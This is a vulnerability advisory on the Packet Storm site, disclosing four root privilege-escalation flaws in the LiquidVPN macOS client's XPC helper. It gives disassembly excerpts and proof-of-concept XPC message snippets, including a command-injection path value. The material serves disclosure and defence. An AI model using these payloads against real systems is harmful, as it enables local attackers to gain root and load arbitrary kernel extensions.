what you don't know can hurt you
Home Files News &[SERVICES_TAB]About Contact Add New

LiquidVPN For macOS 1.3.7 Privilege Escalation

LiquidVPN For macOS 1.3.7 Privilege Escalation
Posted Nov 3, 2018
Authored by Bernd Leitner

LiquidVPN for macOS versions 1.3.7 and below suffer from privilege escalation vulnerabilities.

tags | exploit, vulnerability
advisories | CVE-2018-18856, CVE-2018-18857, CVE-2018-18858, CVE-2018-18859
SHA-256 | 4d1c989dde2363607adc5bb6659ea54478a98287018c93351b2db3a17753fe0f

LiquidVPN For macOS 1.3.7 Privilege Escalation

Change Mirror Download
=======================================================================
Title: Multiple Privilege Escalation Vulnerabilities
Product: LiquidVPN for MacOS
Vulnerable versions: 1.37, 1.36 and earlier
CVE ID(s): CVE-2018-18856, CVE-2018-18857, CVE-2018-18858, CVE-2018-18859
Impact: Critical
Homepage: https://www.liquidvpn.com
Identified: 2018-09-29
By: Bernd Leitner (bernd.leitner [at] gmail dot com)
=======================================================================

Vendor description:
-------------------
"LiquidVPN creates a secure encrypted link between your device and the
Internet.
When you connect to the Internet from your home, mobile device, office or a
WiFi
hotspot with encryption your traffic canat be monitored by 3rd parties like
your
ISP. Without encryption, your ISP can store information about the websites
you
use and sell that data to anyone willing to pay for it. Some ISPs even
inject
advertisements into web pages to further profit off of the Internet service
you
pay for."

Source: https://www.liquidvpn.com


Business recommendation:
------------------------
By exploiting the vulnerabilities documented in this advisory, an attacker
can fully compromise a MacOS system with an installation of the LiquidVPN
client.

Users are urged to uninstall the application until the vendor ships a new
version
of the LiquidVPN client.


Vulnerability overview/description:
-----------------------------------
LiquidVPN installs the helper tool "com.smr.liquidvpn.OVPNHelper" for
performing
privileged (root) actions. In order to allow other LiquidVPN components to
send
messages to the helper tool, it implements an XPC service. Static code
analysis
showed, that the XPC service does not filter incoming messages. This means,
regular users (local attackers) can craft arbitrary XPC messages and send
them
to the service. This leads to the following issues:


1) "anycmd" Privilege Escalation (reserved CVE-2018-18857)

After receiving a message, the service checks for the existence of the
"anycmd" parameter:

============================================================================================
...
__text:00000001000012E8 lea rsi, aAnycmd ; "anycmd"
__text:00000001000012EF mov rdi, r14 ; char *
__text:00000001000012F2 call _strcmp
__text:00000001000012F7 test eax, eax
__text:00000001000012F9 jnz loc_1000016C2
__text:00000001000012FF mov [rbp+var_10A38], r15
__text:0000000100001306 lea rsi, aCommandLine ;
"command_line"
__text:000000010000130D mov rdi, rbx
...
__text:0000000100001336 lea rsi, aR ; "r"
__text:000000010000133D mov rdi, r14 ; char *
__text:0000000100001340 call _popen
...
============================================================================================

If "anycmd" is found, the "command_line" parameter is extracted from the
message
and directly passed on to a call to popen() as an argument.


2) "openvpncmd" Privilege Escalation (reserved CVE-2018-18856)

Similar to the previous vulnerability, the service checks if the "openvpn"
parameter exists. If it does, the "openvpncmd" parameter is extracted and
passed
on to a system() call as an argument:

============================================================================================
...
__text:00000001000013F1 lea rsi, aOpenvpncmd ;
"openvpncmd"
__text:00000001000013F8 mov rdi, rbx
__text:00000001000013FB call _xpc_dictionary_get_string
...
__text:000000010000166A mov rdi, r15 ; char *
__text:000000010000166D call _system
__text:0000000100001672 lea rsi, aReply ; "reply"
__text:0000000100001679 lea rdx, aOpenvpnCommand ;
"openvpn command executed (ver 3)"
__text:0000000100001680 mov rdi, r12
__text:0000000100001683 call _xpc_dictionary_set_string
...
============================================================================================

3) OS Command Injection (reserved CVE-2018-18858)

If the service detects the "openvpn" parameter in a message, it also checks
if
the parameters "tun_path" or "tap_path" exist. If one of them (or both)
are found,
the values are used as source paths for a copy process using the system()
function.
However, the paths are not sanitized before being passed to system():

============================================================================================
...
__text:00000001000013CD lea rsi, aPathTun ; "path_tun"
__text:00000001000013D4 mov rdi, rbx
__text:00000001000013D7 call _xpc_dictionary_get_string
__text:00000001000013DC mov r14, rax
__text:00000001000013DF lea rsi, aPathTap ; "path_tap"
__text:00000001000013E6 mov rdi, rbx
__text:00000001000013E9 call _xpc_dictionary_get_string
...
__text:000000010000143F call _strcat
__text:0000000100001444 mov rdi, rbx ; char *
__text:0000000100001447 call _strlen
...
__text:0000000100001497 mov rdi, rbx ; char *
__text:000000010000149A call _system
..
============================================================================================

4) Loading of arbitrary Kernel Extensions (reserved CVE-2018-18859)

The previous vulnerability can also be used to directly install an arbitrary
kernel extension. When the client is installed, "tun_path" and "tap_path"
are
pointed to the application folder for installing
"/Applications/LiquidVPN.app/Contents/Resources/tun.kext" and
"/Applications/LiquidVPN.app/Contents/Resources/tap.kext".
By crafting an XPC message containing attacker controlled kernel extension
paths,
the helper tool installs the kernel extensions using a call to the system
function
kextload(). Note: Since MacOS 10.13, a Kext needs to be signed. In
adddition to that,
Apple introduced user-approval for installing third party kernel
extensions. However,
as an attacker has local access to the system and user-approval does not
require the
user to enter a root or admin password, this is not a problem.


Proof of concept:
-----------------
The following proof of concepts can be used to execute arbitrary system
commands:

1) "anycmd" Privilege Escalation

============================================================================================
...
xpc_dictionary_set_string(message, "cmd", "anycmd");
xpc_dictionary_set_bool(message, "blocking", FALSE);
xpc_dictionary_set_string(message, "command_line", "[ARBITRARY CMD]");
...
============================================================================================

2) "openvpncmd" Privilege Escalation

============================================================================================
...
xpc_dictionary_set_string(message, "cmd", "openvpn");
xpc_dictionary_set_string(message, "openvpncmd", "[ARBITRARY CMD]");
...
============================================================================================

3) OS Command Injection

============================================================================================
...
xpc_dictionary_set_string(message, "cmd", "openvpn");
xpc_dictionary_set_string(message, "path_tun", "/tmp/__dummy00_;[ARBITRARY
CMD]");
...
============================================================================================

4) Loading of arbitrary Kernel Extensions

============================================================================================
...
xpc_dictionary_set_string(message, "cmd", "openvpn");
xpc_dictionary_set_string(message, "path_tun", "[PATH TO KEXT]");
...
============================================================================================


Vulnerable / tested versions:
-----------------------------
The following version has been tested and found to be vulnerable:
1.37 (most recent) and 1.36.

Earlier versions might be vulnerable as well.


Vendor contact timeline:
------------------------
2018-10-04: Requested security contact via twitter @LiquidVPN
2018-10-11: Contacted vendor through dave@liquidvpn.com
2018-10-11: Sent PGP encrypted advisory (
https://my.liquidvpn.com/canary/syswan)
2018-10-17: Requested status update from vendor
2018-10-30: Sent new contact details & public PGP key to dave@liquidvpn.com
2018-10-30: Received vendor notification:
No patches will be issued as the LiquidVPN client for MacOS
will be
replaced by new app in the future
2018-10-31: Published to Full Disclosure Mailing List

Solution:
---------
None.


Workaround:
-----------
None.


EOF B. Leitner / @2018


Login or Register to add favorites

File Archive:

March 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Mar 1st
    16 Files
  • 2
    Mar 2nd
    0 Files
  • 3
    Mar 3rd
    0 Files
  • 4
    Mar 4th
    32 Files
  • 5
    Mar 5th
    28 Files
  • 6
    Mar 6th
    42 Files
  • 7
    Mar 7th
    17 Files
  • 8
    Mar 8th
    13 Files
  • 9
    Mar 9th
    0 Files
  • 10
    Mar 10th
    0 Files
  • 11
    Mar 11th
    15 Files
  • 12
    Mar 12th
    19 Files
  • 13
    Mar 13th
    21 Files
  • 14
    Mar 14th
    38 Files
  • 15
    Mar 15th
    15 Files
  • 16
    Mar 16th
    0 Files
  • 17
    Mar 17th
    0 Files
  • 18
    Mar 18th
    10 Files
  • 19
    Mar 19th
    32 Files
  • 20
    Mar 20th
    46 Files
  • 21
    Mar 21st
    16 Files
  • 22
    Mar 22nd
    13 Files
  • 23
    Mar 23rd
    0 Files
  • 24
    Mar 24th
    0 Files
  • 25
    Mar 25th
    12 Files
  • 26
    Mar 26th
    31 Files
  • 27
    Mar 27th
    19 Files
  • 28
    Mar 28th
    42 Files
  • 29
    Mar 29th
    0 Files
  • 30
    Mar 30th
    0 Files
  • 31
    Mar 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close